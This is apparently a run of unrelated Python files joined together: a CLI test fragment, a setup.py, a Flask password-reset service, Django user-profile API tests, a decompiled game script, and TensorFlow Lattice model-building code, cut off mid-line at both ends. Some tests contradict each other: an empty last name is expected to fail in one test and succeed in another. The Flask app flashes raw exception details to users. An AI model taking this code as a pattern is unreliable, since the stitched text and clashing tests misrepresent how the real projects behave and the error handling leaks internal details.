interactive cc.fail_2(['pprotect', 'decrypt-domain', '--non-interactive', '--ignore-env', DOMAIN_NAME]) res = cc.fail_1('pprotect decrypt-domain --non-interactive ' + DOMAIN_NAME, env={'PPROTECT_PASSPHRASE': None}) assert 'Warning: Empty passphrase' in res.stderr # print(open(protected_path).read()) # test removals cc.run(['pprotect', 'rm-owner'], input=[DOMAIN_NAME, MH_EMAIL]) cc.run(['pprotect', 'rm-secret'], input=[DOMAIN_NAME, SECRET_NAME]) cc.run(['pprotect', 'rm-domain', '--confirm'], input=[DOMAIN_NAME, 'y']) def test_main(tmp_path): # TODO: pytest-cov knows how to make coverage work across # subprocess boundaries... os.chdir(str(tmp_path)) res = subprocess.check_output(['pprotect', 'version']) assert res.decode('utf8').startswith('pocket_protector version') res = subprocess.check_output(['pocket_protector', 'version']) assert res.decode('utf8').startswith('pocket_protector version') setup.py #!/usr/bin/env python from setuptools import setup version = "0.0.1" setup( name='numpylint', version=version, description='Linter for numeric python code', author='', author_email='', url='http://github.com/perimosocordiae/numpylint', license='MIT', classifiers=[ 'Development Status :: 4 - Beta', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python', ], packages=['numpylint'], install_requires=['rope'], scripts=[ 'numpylint/numpylinter.py', ] ) #!/usr/bin/env python3 # -*- coding:utf-8 -*- """ @project: passreset @component: core @copyright: © 2020 by vfabi @author: vfabi @support: vfabi @initial date: 2020-05-08 21:08:07 @license: this file is subject to the terms and conditions defined in file 'LICENSE', which is part of this source code package @description: @todo: """ import os import logging from flask import Flask, render_template, flash, redirect, url_for, request from application.core.forms import PasswdResetForm, PasswdChangeForm from application.core.models import ResetLinkModel from application.core.utils import variables, CustomCaptcha, SecurityHandler, mailer, backend captcha = CustomCaptcha(config={'SECRET_CSRF_KEY': variables['FLASK_SIMPLE_CAPTCHA_SECRET_CSRF_KEY']}) app = Flask(__name__, template_folder=os.path.abspath('application/templates'), static_folder='application/static') app.config['SECRET_KEY'] = variables['FLASK_SECRET_KEY'] app = captcha.init_app(app) app.jinja_env.globals.update(variables=variables) app.logger.handlers[0].setFormatter(logging.Formatter("%(asctime)s [%(name)s] %(levelname)s %(message)s")) security_handler = SecurityHandler(app.logger) resetlink_storage = ResetLinkModel() @app.route("/", methods=['GET', 'POST']) @app.route("/reset", methods=['GET', 'POST']) def reset(): form = PasswdResetForm() if form.validate_on_submit(): try: # check captcha captcha_hash = request.form.get('captcha-hash') captcha_text = request.form.get('captcha_text') if not captcha.verify(captcha_text, captcha_hash): security_handler.process(message='Invalid captcha.', ipaddress=request.remote_addr, level='warning') flash(f'Captcha is not valid. 
Please try again.', 'warning') return redirect(url_for('reset')) # check email exists in user database if backend.check_exists(form.email.data): resetlink_string = resetlink_storage.generate() resetlink_url = f'{request.url_root}resetlink/{resetlink_string}/' resetlink_storage.add(resetlink_string, form.email.data) mailer.sendmail(resetlink_url, form.email.data) security_handler.process(message=f'Resetlink sent to {form.email.data}.', ipaddress=request.remote_addr, level='info') flash(f'Password reset link sent to {form.email.data}.', 'success') return redirect(url_for('reset')) else: security_handler.process(message=f'Email {form.email.data} was not found in user registry.', ipaddress=request.remote_addr, level='warning') flash(f'Email {form.email.data} was not found in user registry', 'warning') return redirect("reset") except Exception as e: security_handler.process(message=f'Exception: {e}.', ipaddress=request.remote_addr, level='error') flash(f'Internal error. Details: {e}.', 'danger') return render_template('blank.html', title='Error') return render_template('reset.html', title=variables['page_title'], form=form, captcha=captcha.create()) @app.route('/resetlink//', methods=['GET', 'POST']) def article(resetlink): if resetlink_storage.exists(resetlink): form = PasswdChangeForm() if form.validate_on_submit(): try: email = resetlink_storage.get(resetlink) backend.change_password(email, form.new_password.data) resetlink_storage.delete(resetlink) security_handler.process(message=f'Password for {email} was changed.', ipaddress=request.remote_addr, level='info') flash('Your password was successfully changed.', 'success') return render_template('blank.html', title='Success') except Exception as e: security_handler.process(message=f'Exception: {e}.', ipaddress=request.remote_addr, level='error') flash(f'Internal error. 
Details: {e}.', 'danger') return render_template('blank.html', title='Error') return render_template('resetlink_ok.html', title=variables['page_title'], form=form) security_handler.process(message='Incorrect link or your link expaired.', ipaddress=request.remote_addr, level='warning') flash('Incorrect link or your link expaired.', 'warning') return render_template('blank.html', title='Warning'), 403 @app.errorhandler(404) def page_not_found(e): security_handler.process(message='404 Page not found.', ipaddress=request.remote_addr, level='warning') return render_template('404.html', title='Error 404'), 404 if __name__ == "__main__": app.run( debug=False, host='0.0.0.0', port=8000 ) shubhi-raft/TANF-app """API Tests.""" from django.contrib.auth import get_user_model import pytest from rest_framework import status User = get_user_model() @pytest.mark.django_db def test_retrieve_user(api_client, user): """Test user retrieval.""" response = api_client.get(f"/v1/users/{user.pk}/") assert response.status_code == status.HTTP_200_OK assert response.data["username"] == user.username @pytest.mark.django_db def test_can_update_own_user(api_client, user): """Test a user can update their own user.""" api_client.login(username=user.username, password="") response = api_client.patch(f"/v1/users/{user.pk}/", {"first_name": "Jane"}) assert response.status_code == status.HTTP_200_OK assert response.data["first_name"] == "Jane" assert User.objects.filter(first_name="Jane").exists() @pytest.mark.django_db def test_cannot_update_user_anonymously(api_client, user): """Test an unauthenticated user cannot update a user.""" response = api_client.patch(f"/v1/users/{user.pk}/", {"first_name": "Jane"}) assert response.status_code == status.HTTP_403_FORBIDDEN @pytest.mark.django_db def test_create_user(api_client, user_data): """Test user creation.""" response = api_client.post("/v1/users/", user_data) assert response.status_code == status.HTTP_201_CREATED assert User.objects.filter(username=user_data["username"]).exists() @pytest.mark.django_db def test_set_profile_data(api_client, user): """Test profile data can be set.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "Joe", "last_name": "Bloggs"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "Joe", "last_name": "Bloggs"} user.refresh_from_db() assert user.first_name == "Joe" assert user.last_name == "Bloggs" @pytest.mark.django_db def test_set_profile_data_last_name_apostrophe(api_client, user): """Test profile data last name can be set with an apostrophe.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "Mike", "last_name": "O'Hare"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "Mike", "last_name": "O'Hare"} user.refresh_from_db() assert user.first_name == "Mike" assert user.last_name == "O'Hare" @pytest.mark.django_db def test_set_profile_data_first_name_apostrophe(api_client, user): """Test profile data first name can be set with an apostrophe.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "Pat'Jack", "last_name": "Smith"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "Pat'Jack", "last_name": "Smith"} user.refresh_from_db() assert user.first_name == "Pat'Jack" assert user.last_name == "Smith" 
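# Added sketch (not part of the original test suite): the set_profile cases
# above and below all follow the same login -> POST -> assert pattern, so they
# could also be written with pytest.mark.parametrize. It reuses this module's
# imports and fixtures (pytest, status, api_client, user); the test name is
# hypothetical.
@pytest.mark.django_db
@pytest.mark.parametrize(
    "first_name,last_name",
    [
        ("Mike", "O'Hare"),        # apostrophe in last name
        ("Pat'Jack", "Smith"),     # apostrophe in first name
        ("John", "Smith-O'Hare"),  # hyphen plus apostrophe
    ],
)
def test_set_profile_data_parametrized_sketch(api_client, user, first_name, last_name):
    """Sketch: same flow as the individual set_profile tests, parametrized."""
    api_client.login(username=user.username, password="")
    response = api_client.post(
        "/v1/users/set_profile/",
        {"first_name": first_name, "last_name": last_name},
    )
    assert response.status_code == status.HTTP_200_OK
    user.refresh_from_db()
    assert user.first_name == first_name
    assert user.last_name == last_name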
@pytest.mark.django_db def test_set_profile_data_empty_first_name(api_client, user): """Test profile data cannot be be set if first name is blank.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "", "last_name": "Jones"}, ) assert response.status_code == status.HTTP_400_BAD_REQUEST @pytest.mark.django_db def test_set_profile_data_empty_last_name(api_client, user): """Test profile data cannot be set last name is blank.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "John", "last_name": ""}, ) assert response.status_code == status.HTTP_400_BAD_REQUEST @pytest.mark.django_db def test_set_profile_data_empty_first_name_and_last_name(api_client, user): """Test profile data cannot be set if first and last name are blank.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "", "last_name": ""}, ) assert response.status_code == status.HTTP_400_BAD_REQUEST @pytest.mark.django_db def test_set_profile_data_special_last_name(api_client, user): """Test profile data can be set if last name has multipe special characters.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "John", "last_name": "Smith-O'Hare"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "John", "last_name": "Smith-O'Hare"} user.refresh_from_db() assert user.first_name == "John" assert user.last_name == "Smith-O'Hare" @pytest.mark.django_db def test_set_profile_data_special_first_name(api_client, user): """Test profile data can be set if first name has multiple special characters.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "John-Tom'", "last_name": "Jacobs"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "John-Tom'", "last_name": "Jacobs"} user.refresh_from_db() assert user.first_name == "John-Tom'" assert user.last_name == "Jacobs" @pytest.mark.django_db def test_set_profile_data_spaced_last_name(api_client, user): """Test profile data can be set if last name has a space.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "Joan", "last_name": ""}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "Joan", "last_name": ""} user.refresh_from_db() assert user.first_name == "Joan" assert user.last_name == "" @pytest.mark.django_db def test_set_profile_data_spaced_first_name(api_client, user): """Test profile data can be set if first name has a space.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "", "last_name": "Smith"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "", "last_name": "Smith"} user.refresh_from_db() assert user.first_name == "" assert user.last_name == "Smith" @pytest.mark.django_db def test_set_profile_data_last_name_with_tilde_over_char(api_client, user): """Test profile data can be set if last name includes a tilde character.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "Max", "last_name": "Grecheñ"}, ) assert response.status_code == 
status.HTTP_200_OK assert response.data == {"first_name": "Max", "last_name": "Grecheñ"} user.refresh_from_db() assert user.first_name == "Max" assert user.last_name == "Grecheñ" @pytest.mark.django_db def test_set_profile_data_last_name_with_tilde(api_client, user): """Test profile data can be set if last name includes alternate tilde character.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "Max", "last_name": "Glen~"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "Max", "last_name": "Glen~"} user.refresh_from_db() assert user.first_name == "Max" assert user.last_name == "Glen~" @pytest.mark.django_db def test_set_profile_data_extra_field_include_required(api_client, user): """Test profile data will ignore any extra fields passed in via request body.""" with pytest.raises(AttributeError): """This test will fail if it does not trigger an AttributeError exception""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", { "first_name": "Heather", "last_name": "Class", "middle_initial": "Unknown", }, ) assert response.status_code == status.HTTP_200_OK """Test to ensure response data does not include unknown field""" assert response.data == {"first_name": "Heather", "last_name": "Class"} user.refresh_from_db() assert user.first_name == "Heather" assert user.last_name == "Class" """Test fails if AttributeError exception isn't thrown""" assert user.middle_name == "Unknown" @pytest.mark.django_db def test_set_profile_data_missing_last_name_field(api_client, user): """Test profile data cannot be set if last name field is missing.""" api_client.login(username=user.username, password="") response = api_client.post("/v1/users/set_profile/", {"first_name": "Heather", },) assert response.status_code == status.HTTP_400_BAD_REQUEST @pytest.mark.django_db def test_set_profile_data_missing_first_name_field(api_client, user): """Test profile data cannot be set if first name field is missing.""" api_client.login(username=user.username, password="") response = api_client.post("/v1/users/set_profile/", {"last_name": "Heather", },) assert response.status_code == status.HTTP_400_BAD_REQUEST velocist/TS4CheatsInfo0 # uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\InGame\Gameplay\Scripts\Server\socials\interrogation_group.py # Compiled at: 2014-11-14 04:09:48 # Size of source mod 2**32: 6613 bytes from protocolbuffers import UI_pb2, DistributorOps_pb2 from distributor.ops import GenericProtocolBufferOp from distributor.system import Distributor from interactions.context import InteractionContext from interactions.priority import Priority from sims4.tuning.tunable import TunableReference, TunableThreshold, TunableTuple from socials.group import SocialGroup import enum, services, sims4 class InterrogationUpdateType(enum.Int, export=False): TYPE_START = 0 TYPE_UPDATE = 1 TYPE_STOP = 2 class InterrogationGroup(SocialGroup): INSTANCE_TUNABLES = {'interrogation_statistic':TunableReference(description='\n Statistic to listen to display on the interrogation\n progress.\n ', manager=services.get_instance_manager(sims4.resources.Types.STATISTIC)), 'interrogation_end_interaction_data':TunableTuple(description='\n Tunable information corresponding at the interaction that \n will be pushed when the interrogation 
is done. \n All these tunables are required.\n ', interrogation_statistic_threshold=TunableThreshold(description='\n The threshold that the interrogation stat value will be\n compared to. If the threshold returns true then the\n interrogation end interaction will be pushed from the interrogation\n actor to its interrogation target.\n '), interrogation_end_interaction=TunableReference(description='\n The affordance to push on from the officer (Actor of interaction)\n to the suspect (TargetSim of interaction).\n ', manager=(services.affordance_manager())))} def __init__(self, *args, **kwargs): self._interrogation_callback = None (super().__init__)(*args, **kwargs) def pre_add(self, *_, **__): stat_tracker = self._initiating_sim.get_tracker(self.interrogation_statistic) stat_tracker.add_statistic(self.interrogation_statistic) op = self._get_interrogation_op(InterrogationUpdateType.TYPE_START) Distributor.instance().add_op(self._initiating_sim, op) def _interrogation_statistic_callback(self, stat_type, old_value, new_value): if self.interrogation_statistic is not stat_type: return op = self._get_interrogation_op(InterrogationUpdateType.TYPE_UPDATE) Distributor.instance().add_op(self._initiating_sim, op) if self._initiating_sim is not None: if self._target_sim is not None: if self.interrogation_end_interaction_data.interrogation_statistic_threshold.compare(new_value): context = InteractionContext(self._initiating_sim, InteractionContext.SOURCE_SCRIPT, Priority.High) self._initiating_sim.push_super_affordance(self.interrogation_end_interaction_data.interrogation_end_interaction, self._target_sim, context) def _get_interrogation_op(self, msg_type): if self._target_sim is None or self._initiating_sim is None: return if self._interrogation_callback is None: self._initialize_interrogate_group() stat_tracker = self._initiating_sim.get_tracker(self.interrogation_statistic) stat_instance = stat_tracker.get_statistic(self.interrogation_statistic) if stat_instance is None: decay_rate = 0 stat_value = 0 else: decay_rate = stat_instance.get_change_rate() stat_value = stat_instance._value interrogation_update = UI_pb2.InterrogationProgressUpdate() interrogation_update.type = msg_type interrogation_update.target_id = self._target_sim.id interrogation_update.value = stat_value interrogation_update.decay_rate = decay_rate return GenericProtocolBufferOp(DistributorOps_pb2.Operation.INTERROGATION_PROGRESS_UPDATE, interrogation_update) def _initialize_interrogate_group(self): stat_tracker = self._initiating_sim.get_tracker(self.interrogation_statistic) if self._interrogation_callback is None: self._interrogation_callback = stat_tracker.add_watcher(self._interrogation_statistic_callback) def shutdown(self, finishing_type): if self._initiating_sim: stat_tracker = self._initiating_sim.get_tracker(self.interrogation_statistic) if stat_tracker.has_watcher(self._interrogation_callback): stat_tracker.remove_watcher(self._interrogation_callback) op = self._get_interrogation_op(InterrogationUpdateType.TYPE_STOP) Distributor.instance().add_op(self._initiating_sim, op) super().shutdown(finishing_type)# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Implementation of algorithms required for premade models.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy import enum import itertools from . import aggregation_layer from . import categorical_calibration_layer from . import configs from . import kronecker_factored_lattice_layer as kfll from . import kronecker_factored_lattice_lib as kfl_lib from . import lattice_layer from . import lattice_lib from . import linear_layer from . import pwl_calibration_layer from . import rtl_layer from . import utils from absl import logging import numpy as np import six import tensorflow as tf # Layer names used for layers in the premade models. AGGREGATION_LAYER_NAME = 'tfl_aggregation' CALIB_LAYER_NAME = 'tfl_calib' INPUT_LAYER_NAME = 'tfl_input' KFL_LAYER_NAME = 'tfl_kronecker_factored_lattice' LATTICE_LAYER_NAME = 'tfl_lattice' LINEAR_LAYER_NAME = 'tfl_linear' OUTPUT_LINEAR_COMBINATION_LAYER_NAME = 'tfl_output_linear_combination' OUTPUT_CALIB_LAYER_NAME = 'tfl_output_calib' RTL_LAYER_NAME = 'tfl_rtl' RTL_INPUT_NAME = 'tfl_rtl_input' # Prefix for passthrough (identity) nodes for shared calibration. # These nodes pass shared calibrated values to submodels in an ensemble. CALIB_PASSTHROUGH_NAME = 'tfl_calib_passthrough' # Prefix for defining feature calibrator regularizers. _INPUT_CALIB_REGULARIZER_PREFIX = 'calib_' # Prefix for defining output calibrator regularizers. _OUTPUT_CALIB_REGULARIZER_PREFIX = 'output_calib_' # Weight of laplacian in feature importance for the crystal algorithm. _LAPLACIAN_WEIGHT_IN_IMPORTANCE = 6.0 # Discount amount for repeated co-occurrence of pairs of features in crystals. _REPEATED_PAIR_DISCOUNT_IN_CRYSTALS_SCORE = 0.5 # Maximum number of swaps for the crystals algorithm. 
_MAX_CRYSTALS_SWAPS = 1000 def _input_calibration_regularizers(model_config, feature_config): """Returns pwl layer regularizers defined in the model and feature configs.""" regularizer_configs = [] regularizer_configs.extend(feature_config.regularizer_configs or []) regularizer_configs.extend(model_config.regularizer_configs or []) return [(r.name.replace(_INPUT_CALIB_REGULARIZER_PREFIX, ''), r.l1, r.l2) for r in regularizer_configs if r.name.startswith(_INPUT_CALIB_REGULARIZER_PREFIX)] def _middle_calibration_regularizers(model_config): """Returns pwl layer regularizers defined in the model config.""" regularizer_configs = [] regularizer_configs.extend(model_config.regularizer_configs or []) return [(r.name.replace(_INPUT_CALIB_REGULARIZER_PREFIX, ''), r.l1, r.l2) for r in regularizer_configs if r.name.startswith(_INPUT_CALIB_REGULARIZER_PREFIX)] def _output_calibration_regularizers(model_config): """Returns output calibration regularizers defined in the model config.""" return [(r.name.replace(_OUTPUT_CALIB_REGULARIZER_PREFIX, ''), r.l1, r.l2) for r in model_config.regularizer_configs or [] if r.name.startswith(_OUTPUT_CALIB_REGULARIZER_PREFIX)] def _lattice_regularizers(model_config, feature_configs): """Returns lattice regularizers defined in the model and feature configs.""" # dict from regularizer name to pair of per feature l1 and l2 amounts. regularizers_dict = {} n_dims = len(feature_configs) for index, feature_config in enumerate(feature_configs): for regularizer_config in feature_config.regularizer_configs or []: if not ( regularizer_config.name.startswith(_INPUT_CALIB_REGULARIZER_PREFIX) or regularizer_config.name.startswith(_OUTPUT_CALIB_REGULARIZER_PREFIX)): if regularizer_config.name not in regularizers_dict: regularizers_dict[regularizer_config.name] = ([0.0] * n_dims, [0.0] * n_dims) regularizers_dict[ regularizer_config.name][0][index] += regularizer_config.l1 regularizers_dict[ regularizer_config.name][1][index] += regularizer_config.l2 regularizers = [(k,) + v for k, v in regularizers_dict.items()] for regularizer_config in model_config.regularizer_configs or []: if not ( regularizer_config.name.startswith(_INPUT_CALIB_REGULARIZER_PREFIX) or regularizer_config.name.startswith(_OUTPUT_CALIB_REGULARIZER_PREFIX)): regularizers.append((regularizer_config.name, regularizer_config.l1, regularizer_config.l2)) return regularizers class LayerOutputRange(enum.Enum): """Enum to indicate the output range based on the input of the next layers.""" MODEL_OUTPUT = 1 INPUT_TO_LATTICE = 2 INPUT_TO_FINAL_CALIBRATION = 3 def _output_range(layer_output_range, model_config, feature_config=None): """Returns min/max/init_min/init_max for a given output range.""" if layer_output_range == LayerOutputRange.INPUT_TO_LATTICE: if feature_config is None: raise ValueError('Expecting feature config for lattice inputs.') output_init_min = output_min = 0.0 output_init_max = output_max = feature_config.lattice_size - 1.0 elif layer_output_range == LayerOutputRange.MODEL_OUTPUT: output_min = model_config.output_min output_max = model_config.output_max # Note: due to the multiplicative nature of KroneckerFactoredLattice layers, # the initialization min/max do not correspond directly to the output # min/max. Thus we follow the same scheme as the KroneckerFactoredLattice # lattice layer to properly initialize the kernel and scale such that # the output does in fact respect the requested bounds. 
if ((isinstance(model_config, configs.CalibratedLatticeEnsembleConfig) or isinstance(model_config, configs.CalibratedLatticeConfig)) and model_config.parameterization == 'kronecker_factored'): output_init_min, output_init_max = kfl_lib.default_init_params( output_min, output_max) else: output_init_min = np.min(model_config.output_initialization) output_init_max = np.max(model_config.output_initialization) elif layer_output_range == LayerOutputRange.INPUT_TO_FINAL_CALIBRATION: output_init_min = output_min = 0.0 output_init_max = output_max = 1.0 else: raise ValueError('Unsupported layer output range.') return output_min, output_max, output_init_min, output_init_max def build_input_layer(feature_configs, dtype, ragged=False): """Creates a mapping from feature name to `tf.keras.Input`. Args: feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. dtype: dtype ragged: If the inputs are ragged tensors. Returns: Mapping from feature name to `tf.keras.Input` for the inputs specified by `feature_configs`. """ input_layer = {} shape = (None,) if ragged else (1,) for feature_config in feature_configs: layer_name = '{}_{}'.format(INPUT_LAYER_NAME, feature_config.name) if feature_config.num_buckets: input_layer[feature_config.name] = tf.keras.Input( shape=shape, ragged=ragged, dtype=tf.int32, name=layer_name) else: input_layer[feature_config.name] = tf.keras.Input( shape=shape, ragged=ragged, dtype=dtype, name=layer_name) return input_layer def build_multi_unit_calibration_layers(calibration_input_layer, calibration_output_units, model_config, layer_output_range, output_single_tensor, dtype): """Creates a mapping from feature names to calibration outputs. Args: calibration_input_layer: A mapping from feature name to `tf.keras.Input`. calibration_output_units: A mapping from feature name to units. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. layer_output_range: A `tfl.premade_lib.LayerOutputRange` enum. output_single_tensor: If output for each feature should be a single tensor. dtype: dtype Returns: A mapping from feature name to calibration output Tensors. """ calibration_output = {} for feature_name, units in calibration_output_units.items(): if units == 0: raise ValueError( 'Feature {} is not used. 
Calibration output units is 0.'.format( feature_name)) feature_config = model_config.feature_config_by_name(feature_name) calibration_input = calibration_input_layer[feature_name] layer_name = '{}_{}'.format(CALIB_LAYER_NAME, feature_name) (output_min, output_max, output_init_min, output_init_max) = _output_range(layer_output_range, model_config, feature_config) if feature_config.num_buckets: kernel_initializer = tf.keras.initializers.RandomUniform( output_init_min, output_init_max) calibrated = ( categorical_calibration_layer.CategoricalCalibration( num_buckets=feature_config.num_buckets, units=units, output_min=output_min, output_max=output_max, kernel_initializer=kernel_initializer, monotonicities=feature_config.monotonicity if isinstance( feature_config.monotonicity, list) else None, default_input_value=feature_config.default_value, split_outputs=(units > 1 and not output_single_tensor), dtype=dtype, name=layer_name)(calibration_input)) else: kernel_regularizer = _input_calibration_regularizers( model_config, feature_config) monotonicity = feature_config.monotonicity if (utils.canonicalize_monotonicity(monotonicity) == 0 and feature_config.pwl_calibration_always_monotonic): monotonicity = 1 kernel_initializer = pwl_calibration_layer.UniformOutputInitializer( output_min=output_init_min, output_max=output_init_max, monotonicity=monotonicity, keypoints=feature_config.pwl_calibration_input_keypoints) calibrated = ( pwl_calibration_layer.PWLCalibration( units=units, input_keypoints=feature_config.pwl_calibration_input_keypoints, output_min=output_min, output_max=output_max, clamp_min=feature_config.pwl_calibration_clamp_min, clamp_max=feature_config.pwl_calibration_clamp_max, missing_input_value=feature_config.default_value, impute_missing=(feature_config.default_value is not None), kernel_initializer=kernel_initializer, kernel_regularizer=kernel_regularizer, monotonicity=monotonicity, convexity=feature_config.pwl_calibration_convexity, split_outputs=(units > 1 and not output_single_tensor), input_keypoints_type=feature_config .pwl_calibration_input_keypoints_type, dtype=dtype, name=layer_name)(calibration_input)) if output_single_tensor: calibration_output[feature_name] = calibrated elif units == 1: calibration_output[feature_name] = [calibrated] else: # calibrated will have already been split in this case. calibration_output[feature_name] = calibrated return calibration_output def build_calibration_layers(calibration_input_layer, model_config, layer_output_range, submodels, separate_calibrators, dtype): """Creates a calibration layer for `submodels` as list of list of features. Args: calibration_input_layer: A mapping from feature name to `tf.keras.Input`. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. layer_output_range: A `tfl.premade_lib.LayerOutputRange` enum. submodels: A list of list of feature names. separate_calibrators: If features should be separately calibrated for each lattice in an ensemble. dtype: dtype Returns: A list of list of Tensors representing a calibration layer for `submodels`. """ # Create a list of (feature_name, calibration_output_idx) pairs for each # submodel. When using shared calibration, all submodels will have # calibration_output_idx = 0. 
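# Added worked illustration (comment only, hypothetical feature names): with
# submodels = [['price', 'size'], ['price', 'rooms']] and
# separate_calibrators=True, the loop below yields
#     submodels_input_features = [[('price', 0), ('size', 0)],
#                                 [('price', 1), ('rooms', 0)]]
# and calibration_output_units = {'price': 2, 'size': 1, 'rooms': 1}.
# With separate_calibrators=False every index stays 0 and max(index, 1)
# clamps each feature to a single shared calibrator unit.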
submodels_input_features = [] calibration_last_index = collections.defaultdict(int) for submodel in submodels: submodel_input_features = [] submodels_input_features.append(submodel_input_features) for feature_name in submodel: submodel_input_features.append( (feature_name, calibration_last_index[feature_name])) if separate_calibrators: calibration_last_index[feature_name] += 1 # This is to account for shared calibration. calibration_output_units = { name: max(index, 1) for name, index in calibration_last_index.items() } calibration_output = build_multi_unit_calibration_layers( calibration_input_layer=calibration_input_layer, calibration_output_units=calibration_output_units, model_config=model_config, layer_output_range=layer_output_range, output_single_tensor=False, dtype=dtype) # Create passthrough nodes for each submodel input so that we can recover # the model structure for plotting and analysis. # {CALIB_PASSTHROUGH_NAME}_{feature_name}_ # {calibration_output_idx}_{submodel_idx}_{submodel_input_idx} submodels_inputs = [] for submodel_idx, submodel_input_features in enumerate( submodels_input_features): submodel_inputs = [] submodels_inputs.append(submodel_inputs) for (submodel_input_idx, (feature_name, calibration_output_idx)) in enumerate(submodel_input_features): passthrough_name = '{}_{}_{}_{}_{}'.format(CALIB_PASSTHROUGH_NAME, feature_name, calibration_output_idx, submodel_idx, submodel_input_idx) submodel_inputs.append( tf.identity( calibration_output[feature_name][calibration_output_idx], name=passthrough_name)) return submodels_inputs def build_aggregation_layer(aggregation_input_layer, model_config, calibrated_lattice_models, layer_output_range, submodel_index, dtype): """Creates an aggregation layer using the given calibrated lattice models. Args: aggregation_input_layer: A list or a mapping from feature name to `tf.keras.Input`, in the order or format expected by `calibrated_lattice_models`. model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. calibrated_lattice_models: A list of calibrated lattice models of size model_config.middle_diemnsion, where each calbirated lattice model instance is constructed using the same model configuration object. layer_output_range: A `tfl.premade_lib.LayerOutputRange` enum. submodel_index: Corresponding index into submodels. dtype: dtype Returns: A list of list of Tensors representing a calibration layer for `submodels`. """ (output_min, output_max, output_init_min, output_init_max) = _output_range(layer_output_range, model_config) lattice_sizes = [model_config.middle_lattice_size ] * model_config.middle_dimension lattice_monotonicities = [1] * model_config.middle_dimension # Create the aggergated embeddings to pass to the middle lattice. 
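# Added note: each middle dimension i below wraps calibrated_lattice_models[i]
# in an Aggregation layer applied to the shared aggregation_input_layer,
# reshapes the scalar output to shape (1,), optionally runs it through a
# middle PWLCalibration (with keypoints in [-1, 1]), and appends the result to
# lattice_inputs, which feed the final middle Lattice layer.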
lattice_inputs = [] for i in range(model_config.middle_dimension): agg_layer_name = '{}_{}'.format(AGGREGATION_LAYER_NAME, i) agg_output = aggregation_layer.Aggregation( calibrated_lattice_models[i], name=agg_layer_name)( aggregation_input_layer) agg_output = tf.keras.layers.Reshape((1,))(agg_output) if model_config.middle_calibration: agg_output = pwl_calibration_layer.PWLCalibration( input_keypoints=np.linspace( -1.0, 1.0, num=model_config.middle_calibration_num_keypoints, dtype=np.float32), output_min=0.0, output_max=lattice_sizes[i] - 1.0, monotonicity=utils.canonicalize_monotonicity( model_config.middle_monotonicity), kernel_regularizer=_middle_calibration_regularizers(model_config), input_keypoints_type=model_config .middle_calibration_input_keypoints_type, dtype=dtype, )( agg_output) agg_output = tf.keras.layers.Reshape((1,))(agg_output) lattice_inputs.append(agg_output) # We use random monotonic initialization here to break the symmetry that we # would otherwise have between middle lattices. Since we use the same # CalibratedLattice for each of the middle dimensions, if we do not randomly # initialize the middle lattice we will have the same gradient flow back for # each middle dimension, thus acting the same as if there was only one middle # dimension. kernel_initializer = lattice_layer.RandomMonotonicInitializer( lattice_sizes=lattice_sizes, output_min=output_init_min, output_max=output_init_max) lattice_layer_name = '{}_{}'.format(LATTICE_LAYER_NAME, submodel_index) return lattice_layer.Lattice( lattice_sizes=lattice_sizes, monotonicities=lattice_monotonicities, output_min=output_min, output_max=output_max, clip_inputs=False, interpolation=model_config.middle_lattice_interpolation, kernel_initializer=kernel_initializer, dtype=dtype, name=lattice_layer_name, )( lattice_inputs) def _monotonicities_from_feature_configs(feature_configs): """Returns list of monotonicities defined in the given feature_configs.""" monotonicities = [] for feature_config in feature_configs: if not feature_config.monotonicity: monotonicities.append(0) elif (isinstance(feature_config.monotonicity, six.string_types) and feature_config.monotonicity.lower() == 'none'): monotonicities.append(0) else: monotonicities.append(1) return monotonicities def _dominance_constraints_from_feature_configs(feature_configs): """Returns list of dominance constraints in the given feature_configs.""" feature_names = [feature_config.name for feature_config in feature_configs] monotonic_dominances = [] for dominant_idx, dominant_feature_config in enumerate(feature_configs): for dominance_config in dominant_feature_config.dominates or []: if dominance_config.feature_name in feature_names: weak_idx = feature_names.index(dominance_config.feature_name) if dominance_config.dominance_type == 'monotonic': monotonic_dominances.append((dominant_idx, 